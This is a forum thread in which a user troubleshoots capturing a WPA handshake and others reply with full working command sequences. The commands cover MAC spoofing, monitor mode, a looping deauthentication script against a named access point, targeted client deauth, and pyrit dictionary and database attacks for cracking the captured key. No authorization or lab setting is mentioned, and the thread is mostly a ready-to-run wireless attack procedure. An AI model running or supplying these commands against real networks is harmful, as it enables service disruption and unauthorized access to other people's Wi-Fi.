Jump to content

Can't capture WPA handshake


GarrettVD
 Share

Recommended Posts

I'm trying to capture a 4-way WPA handshake using the Aircrack-ng suite of tools, in order to capture a 4-way WPA handshake.

The first issue was that, depite being in very close proximity, I was unable to see any clients in the terminal or .csv logs while running airodump-ng targeting a specific bssid on channel 1 + sending a few mass (ie. not targeted to a specific client MAC) deauth's every 15 seconds. No clients in the .CSV logs, yet I was able to see lots of probe responses from clients on the network, and beacons etc. (See screenshot #1)

So I then tried to target a specific device MAC address on the network. (Screenshot #2) The device appeared under in the CSV log under Station MACs. But still, no WPA handshakes. Weird. So I checked the logs, and I can see that there is communication to the AP from the client, and vice-versa, but no handshakes. Hmmm.

post-48140-0-42290700-1444525771_thumb.p

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
6C:19:8F:E5:G5:1E, 2015-10-10 00:37:36, 2015-10-10 00:40:09, 1, 54, WPA2, CCMP TKIP,PSK, -54, 1106, 96, 0. 0. 0. 0, 6, KingEagle,


Using the


#!/bin/bash
airmon-ng stop wlan1mon; \
ifconfig wlan1 down; \
ifconfig wlan0 down; \
macchanger -r wlan1; \
ifconfig wlan1 up; \
airmon-ng start wlan1 1; \
airodump-ng -c 1 --bssid 6C:19:8F:E5:G5:1E --showack --write /usb/airdump-log wlan1mon </dev/null &>/dev/null & \
while sleep 15; do aireplay-ng -0 5 -a 6C:19:8F:E5:G5:1E wlan1mon --ignore-negative-one; done


I'm attaching a screenshot of the probe responses and deauthentication packets.

Any help would be great!

Thanks,

Screenshot #1 - Mass Deauthentication

lx1Sunp.png

Screenshot #2 - Targeting HonHai___

wS5j8oK.png

Edited by GarrettVD
Link to comment
Share on other sites

ifconfig wlan1 down

macchanger -r wlan1

iwconfig wlan1 mode monitor

ifconfig wlan1 up

airodump-ng -c 10 -w /path/to/Capture/output/NETGEAR --bssid 00:11:22:33:44:55 wlan1

//deauth client mac 5x
aireplay-ng -0 5 -e NETGEAR -c 00:11:22:33:44:55 wlan1

Edited by hairbag
Link to comment
Share on other sites

havent played with wireshark enough to comment on it but above is what ive used and it always works. not sure about your script as i just do it manually in two terminal windows. one for capture and one for deauth.

after capture analyze with pyrit if you are set up for gpu processing

//analyze

pyrit -r /path/to/capture/files/SSID-01.cap analyze

//strip and clean cap file

pyrit -r /path/to/capture/files/SSID-01.cap -o /path/to/capture/files/SSID-01.cap.gz strip

//passthrough attack

pyrit -r /path/to/capture/files/SSID-01.cap.gz -i /path/to/password/files/superWPA.lzma -b 11:22:33:44:55:66 attack_passthrough

or database

//import passwords

pyrit -i /path/to/password/files/superWPA.lzma import_unique_passwords

//add ssid to database

pyrit -e create_essid SSID

//batch process rainbows
pyrit batch

//attack cap file

pyrit -r /path/to/capture/files/SSID-01.cap.gz attack_db --all-handshakes

//delete ssid from db

pyrit -e SSID delete_essid

Edited by hairbag
Link to comment
Share on other sites

open up two terminals and if your arent seeing clients and the ssid in the airodump window you wont get handshakes, deauth wont work unless your nic's support injection. i remember seeing something somewhere about non-patched drivers and having to use --ignore-negative-one to avoid errors ,

what type of network adapters are you using? buy some alfa's and you will do the dance of joy.

in your script you put wlan0 down after putting wlan1 in monitor mode...try on wlan0

try

airodump-ng wlan0 --manufacturer --wps

if you dont get a big list of all your neighbors wifi then your nic is the issue.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...